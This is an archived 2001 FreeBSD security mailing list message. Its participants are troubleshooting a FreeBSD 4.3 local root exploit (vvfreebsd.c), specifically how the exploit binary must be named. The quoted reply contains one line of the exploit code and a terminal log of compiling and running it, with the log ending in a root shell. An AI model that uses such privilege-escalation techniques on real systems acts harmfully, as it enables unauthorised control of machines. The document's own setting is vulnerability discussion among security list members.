Date: Thu, 12 Jul 2001 10:37:10 -0700 From: Jason DiCioccio <jdicioccio@epylon.com> To: 'Przemyslaw Frasunek' <venglin@freebsd.lublin.pl>, Jason DiCioccio <geniusj@bluenugget.net>, Matjaz Martincic <matjaz.martincic@hermes.si>, security@FreeBSD.ORG Subject: RE: FreeBSD 4.3 local root Message-ID: <657B20E93E93D4118F9700D0B73CE3EA02FFEFB9@goofy.epylon.lan>
next in thread | raw e-mail | index | archive | help
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Try naming it a.out, it sure didnt work for me that way.. - ------- Jason DiCioccio Evil Genius Unix BOFH - -----Original Message----- From: Przemyslaw Frasunek [mailto:venglin@freebsd.lublin.pl] Sent: Thursday, July 12, 2001 8:59 AM To: Jason DiCioccio; Matjaz Martincic; security@FreeBSD.ORG Subject: Re: FreeBSD 4.3 local root > The binary must be named vv.. > Name the binary 'vv' and try again No, because argv[0] is exec()ed: if(!execle(av[0],"vv",NULL,environ)) [...] riget:venglin:~> cc -o dupa vvfreebsd.c riget:venglin:~> ./dupa vvfreebsd. Written by Georgi Guninski shall jump to bfbffe72 child=81380 Password:done # id uid=0(root) gid=1001(users) groups=1001(users), 99(rexec) - -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>; iQA/AwUBO03hH1CmU62pemyaEQIriQCg4bfyj3snwfqLbUFJbM0qDrfH7GcAoL7Z xMkdpyQJ4BpdJUGL61rbBAjz =aolt -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?657B20E93E93D4118F9700D0B73CE3EA02FFEFB9>